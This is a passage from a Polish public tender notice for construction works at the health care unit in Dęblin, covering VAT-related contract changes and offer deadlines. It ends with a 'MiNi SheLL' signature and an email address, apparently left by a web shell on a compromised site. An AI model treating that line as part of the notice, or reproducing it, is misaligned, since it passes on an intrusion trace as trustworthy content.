wykonana poszczególne elementy robót i  Zamawiający uzna ,że roboty zostały zakończone i nie będzie miał zastrzeżeń , co do kompletności i prawidłowości dokumentacji powykonawczej, b)Zamawiający będzie w stanie dokonać zapłaty wynagrodzenia.Wykonawcy za  wcześniej wykonany przedmiot umowy. 2.w zakresie wysokości wynagrodzenia Wykonawcy.- w razie zaistnienia  okoliczności , których nie można było przewidzieć  w chwili  składania oferty i zawarcia Umowy,do których zalicza się tylko ustawową zmianę stawek podatku VAT.Zmiana wynagrodzenia dokonana na skutek zmiany stawki VAT będzie polegać na zmniejszeniu lub zwiększeniu wynagrodzenia o różnicę stawki VAT po zmianie i będzie miała zastosowanie do robót, które zgodnie z  harmonogramem rzeczowo-finansowym przypadają do wykonania po terminie zmiany stawki VAT na te roboty.3.W zakresie zmiany Kierownika Budowy i Inspektora Nadzoru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozdeblin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 08-530 Dęblin
ul. Rynek 14 
Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2014 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
08-530 Dęblin
ul. Rynek 14 
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com